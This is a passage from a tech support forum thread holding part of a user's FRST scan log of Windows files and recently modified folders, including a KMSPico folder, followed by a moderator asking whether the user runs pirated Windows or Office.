2018-09-12 04:46 - 2018-08-09 04:10 - 001557504 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2018-09-12 04:46 - 2018-08-09 04:10 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2018-09-12 04:46 - 2018-08-09 04:09 - 000217088 _____ (Microsoft Corporation) C:\WINDOWS\system32\dinput8.dll
2018-09-12 04:46 - 2018-08-09 04:09 - 000165376 _____ (Microsoft Corporation) C:\WINDOWS\system32\dinput.dll
2018-09-12 04:46 - 2018-08-09 03:36 - 000660896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicensingWinRT.dll
2018-09-12 04:46 - 2018-08-09 03:36 - 000221120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EditionUpgradeManagerObj.dll
2018-09-12 04:46 - 2018-08-09 03:24 - 000131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdeploy.dll
2018-09-12 04:46 - 2018-08-09 03:23 - 000291328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnrollUI.dll
2018-09-12 04:46 - 2018-08-09 03:22 - 000668160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2018-09-12 04:46 - 2018-08-09 03:22 - 000429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certreq.exe
2018-09-12 04:46 - 2018-08-09 03:21 - 002016768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2018-09-12 04:46 - 2018-08-09 03:21 - 001274368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2018-09-12 04:46 - 2018-08-09 03:20 - 002401792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AcGenral.dll
2018-09-12 04:46 - 2018-08-09 03:20 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dinput8.dll
2018-09-12 04:46 - 2018-08-09 03:20 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dinput.dll
2018-09-12 04:46 - 2018-08-09 00:01 - 000777400 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2018-09-12 04:46 - 2018-08-08 23:55 - 000230304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2018-09-12 04:46 - 2018-08-08 23:54 - 000375704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2018-09-12 04:46 - 2018-08-08 23:54 - 000203568 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll
2018-09-12 04:46 - 2018-08-08 23:53 - 001947720 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2018-09-12 04:46 - 2018-08-08 23:53 - 001026456 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2018-09-12 04:46 - 2018-08-08 23:53 - 000125600 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptxml.dll
2018-09-12 04:46 - 2018-08-08 23:30 - 000183992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll
2018-09-12 04:46 - 2018-08-08 23:29 - 000099208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptxml.dll
2018-09-12 04:46 - 2018-08-08 23:28 - 001589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2018-09-12 04:46 - 2018-08-08 23:27 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\system32\eShims.dll
2018-09-12 04:46 - 2018-08-08 23:27 - 000051200 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnrollCtrl.exe
2018-09-12 04:46 - 2018-08-08 23:26 - 000990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\IKEEXT.DLL
2018-09-12 04:46 - 2018-08-08 23:26 - 000572416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2018-09-12 04:46 - 2018-08-08 23:26 - 000528384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2018-09-12 04:46 - 2018-08-08 23:26 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\TtlsAuth.dll
2018-09-12 04:46 - 2018-08-08 23:26 - 000221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\TtlsCfg.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000797184 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000460288 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000392704 _____ (Microsoft Corporation) C:\WINDOWS\system32\WaaSMedicSvc.dll
2018-09-12 04:46 - 2018-08-08 23:25 - 000145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2018-09-12 04:46 - 2018-08-08 23:23 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2018-09-12 04:46 - 2018-08-08 23:22 - 001586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2018-09-12 04:46 - 2018-08-08 23:22 - 000316928 _____ (Microsoft Corporation) C:\WINDOWS\system32\GlobCollationHost.dll
2018-09-12 04:46 - 2018-08-08 23:13 - 001189376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Globalization.dll
2018-09-12 04:46 - 2018-08-08 23:13 - 000042496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnrollCtrl.exe
2018-09-12 04:46 - 2018-08-08 23:12 - 000652288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000350208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TtlsAuth.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TtlsCfg.dll
2018-09-12 04:46 - 2018-08-08 23:11 - 000122368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2018-09-12 04:46 - 2018-08-08 23:10 - 000835584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
2018-09-12 04:46 - 2018-08-08 23:09 - 001466368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2018-09-12 04:46 - 2018-08-08 23:08 - 000195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GlobCollationHost.dll
2018-09-12 04:46 - 2018-08-08 22:08 - 000806416 _____ C:\WINDOWS\SysWOW64\locale.nls
2018-09-12 04:46 - 2018-08-08 22:08 - 000806416 _____ C:\WINDOWS\system32\locale.nls

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-10-10 18:36 - 2018-04-11 18:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2018-10-10 18:33 - 2018-08-17 01:04 - 000931448 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2018-10-10 18:33 - 2018-04-11 18:36 - 000000000 ____D C:\WINDOWS\INF
2018-10-10 18:29 - 2018-08-17 01:20 - 000000000 ___RD C:\Users\Christopher&Gabriell\3D Objects
2018-10-10 18:29 - 2018-08-16 19:20 - 000000000 __RHD C:\Users\Public\AccountPictures
2018-10-10 18:29 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\AppReadiness
2018-10-10 18:26 - 2018-08-17 14:59 - 000000422 _____ C:\WINDOWS\Tasks\HPCeeScheduleForChristopher&Gabriell.job
2018-10-10 18:26 - 2018-08-17 01:12 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2018-10-10 18:26 - 2018-08-17 00:55 - 000417088 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2018-10-10 18:25 - 2018-08-17 02:19 - 000065536 _____ C:\WINDOWS\system32\spu_storage.bin
2018-10-10 18:25 - 2018-04-11 16:04 - 000786432 _____ C:\WINDOWS\system32\config\BBI
2018-10-10 18:22 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\TextInput
2018-10-10 18:22 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\system32\ShellExperiences
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\bcastdvr
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ____D C:\Program Files\Windows Defender
2018-10-10 18:21 - 2018-04-11 18:38 - 000000000 ____D C:\Program Files (x86)\Windows Defender
2018-10-10 18:14 - 2018-08-17 06:43 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Opera
2018-10-10 17:49 - 2018-08-17 00:55 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2018-10-10 15:52 - 2018-08-17 14:59 - 000003406 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForChristopher&Gabriell
2018-10-10 07:36 - 2018-04-11 18:30 - 000000000 ____D C:\WINDOWS\CbsTemp
2018-10-10 04:01 - 2018-08-25 01:06 - 000004636 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2018-10-10 04:01 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2018-10-10 04:01 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\system32\Macromed
2018-10-10 01:15 - 2012-07-26 00:26 - 000000167 _____ C:\WINDOWS\win.ini
2018-10-10 01:03 - 2018-04-11 18:34 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2018-10-10 01:02 - 2018-04-11 18:34 - 000494400 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcryptprimitives.dll
2018-10-09 20:40 - 2018-04-11 18:38 - 000000000 ___HD C:\Program Files\WindowsApps
2018-10-07 01:36 - 2018-08-17 01:04 - 000000000 ____D C:\Users\Christopher&Gabriell
2018-10-06 23:33 - 2018-08-31 01:15 - 000000000 ____D C:\Users\Christopher&Gabriell\Downloads\Microsoft Office 2010 Proffesional
2018-10-06 02:46 - 2018-08-19 04:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPatrol
2018-10-06 02:14 - 2018-08-28 20:24 - 000000000 __SHD C:\Users\Christopher&Gabriell\AppData\Roaming\wow64_microsoft-windows-t..phoneutil.resources_31bf3856ad364e35_10.0.17134.1_ru-ru_7075f1f8a024a234
2018-10-06 02:11 - 2018-08-28 20:22 - 000000000 ____D C:\Program Files (x86)\KMSPico 10.2.1 Final
2018-10-04 17:33 - 2018-08-20 16:19 - 000000000 ____D C:\ProgramData\Packages
2018-10-04 02:01 - 2018-08-31 01:14 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Roaming\qBittorrent
2018-10-02 15:13 - 2018-08-18 20:14 - 000835152 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2018-10-02 15:13 - 2018-08-18 20:14 - 000179792 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2018-09-30 01:25 - 2018-08-28 20:27 - 000000000 ____D C:\WINDOWS\Minidump
2018-09-30 01:01 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\InfusedApps
2018-09-30 00:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\registration
2018-09-30 00:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2018-09-28 16:49 - 2018-08-31 01:45 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Microsoft Help
2018-09-25 02:28 - 2018-08-19 04:26 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\ElevatedDiagnostics
2018-09-25 01:33 - 2018-08-17 01:12 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2018-09-22 12:22 - 2018-08-17 01:28 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\D3DSCache
2018-09-22 12:04 - 2018-08-16 18:54 - 000000000 ____D C:\ProgramData\CyberLink
2018-09-21 03:01 - 2018-08-16 18:33 - 000000000 ____D C:\WINDOWS\SysWOW64\sda
2018-09-21 02:40 - 2012-08-03 19:02 - 000000000 ____D C:\SWSetup
2018-09-21 01:58 - 2018-08-16 18:45 - 000000000 ____D C:\ProgramData\install_clap
2018-09-21 01:44 - 2018-08-16 18:38 - 000000000 ____D C:\Program Files (x86)\Hewlett-Packard
2018-09-21 01:44 - 2012-09-18 21:56 - 000000000 ____D C:\Program Files\Hewlett-Packard
2018-09-21 01:27 - 2018-08-16 18:33 - 000000000 ____D C:\Program Files (x86)\Realtek
2018-09-21 01:10 - 2018-08-16 18:44 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2018-09-20 04:51 - 2012-08-03 19:02 - 000000000 ___HD C:\SYSTEM.SAV
2018-09-20 03:37 - 2018-08-16 18:32 - 000000000 ____D C:\ProgramData\AMD
2018-09-20 02:13 - 2018-08-17 02:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2018-09-20 02:13 - 2018-08-17 02:30 - 000000000 ____D C:\Program Files (x86)\HP
2018-09-20 01:28 - 2018-08-16 18:31 - 000000000 ____D C:\Program Files (x86)\ATI Technologies
2018-09-18 21:13 - 2018-08-17 06:10 - 000004352 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1534504190
2018-09-18 21:13 - 2018-08-17 06:09 - 000001551 _____ C:\Users\Christopher&Gabriell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera Browser.lnk
2018-09-16 22:15 - 2018-08-17 01:30 - 000003414 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2942939960-1714500650-1008813090-1002
2018-09-16 22:15 - 2018-08-17 01:28 - 000000000 ___RD C:\Users\Christopher&Gabriell\OneDrive
2018-09-16 22:15 - 2018-08-17 01:04 - 000002456 _____ C:\Users\Christopher&Gabriell\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-09-14 21:19 - 2018-08-16 17:49 - 000000000 ____D C:\Users\Christopher&Gabriell\AppData\Local\Packages
2018-09-13 17:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2018-09-13 17:45 - 2018-04-11 18:38 - 000000000 ____D C:\WINDOWS\system32\oobe
2018-09-13 17:44 - 2018-04-11 16:04 - 000000000 ____D C:\WINDOWS\system32\Dism
2018-09-12 05:36 - 2018-08-25 01:06 - 000004422 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater

==================== Files in the root of some directories =======

2018-09-14 03:17 - 2018-09-16 23:21 - 017190912 _____ () C:\Users\Christopher&Gabriell\AppData\Roaming\Sandra.mdb

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-08-17 00:55

==================== End of FRST.txt ============================
Attached Files
File Type: txt Addition.txt (38.8 KB, 8 views)
angelgabbby is offline  
Sponsored Links
Advertisement
 
Old 10-11-2018, 08:31 PM   #4
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello angelgabbby. Are you running an illegal(pirated) copy of Windows, Office, or both?

------------------------------------------------------
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Closed Thread

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
[IMG] code is on
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Post a Question


» Site Navigation
 > FAQ
  > 10.0.0.2
Powered by vBadvanced CMPS v3.2.3


All times are GMT -7. The time now is 05:26 PM.


Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2020, vBulletin Solutions, Inc.
vBulletin Security provided by vBSecurity v2.2.2 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
User Alert System provided by Advanced User Tagging v3.1.0 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
Copyright 2001 - 2018, Tech Support Forum

Windows 10 - Windows 7 - Windows XP - Windows Vista - Trojan Removal - Spyware Removal - Virus Removal - Networking - Security - Top Web Hosts